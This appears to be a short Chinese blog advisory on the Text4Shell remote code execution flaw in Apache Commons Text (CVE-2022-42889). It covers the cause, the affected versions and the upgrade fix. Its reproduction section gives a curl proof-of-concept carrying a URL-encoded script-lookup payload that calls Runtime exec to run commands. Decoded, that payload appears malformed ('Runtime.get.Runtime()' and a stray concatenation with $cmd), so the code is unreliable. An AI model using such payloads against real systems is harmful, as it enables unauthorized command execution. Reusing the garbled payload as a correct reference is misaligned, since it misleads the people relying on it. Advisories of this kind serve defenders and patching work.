Apache Commons Text <1.10.0 Text4Shell远程代码执行漏洞CVE-2022-42889

漏洞描述

Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。

Apache Commons Text 1.10.0 之前的版本中由于插值默认值验证不当从而存在远程代码执行漏洞。其原因是因为 Apache Commons Text 插值格式 “${prefix:name}” 中的 “prefix” 用于定位执行插值的 org.apache.commons.text.lookup.StringLookup 的实例,如果 Lookup 实例中包含了不受信任的配置值,则在受影响版本中使用插值默认值的应用程序容易受到远程代码执行或与远程服务器的错误联络。
 


 

影响范围

org.apache.commons:commons-text@[1.0, 1.10.0)
 


 

漏洞复现

PoC

curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D

 


 

修复方案

升级 org.apache.commons:commons-text 1.10.0 或更高版本
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像严后0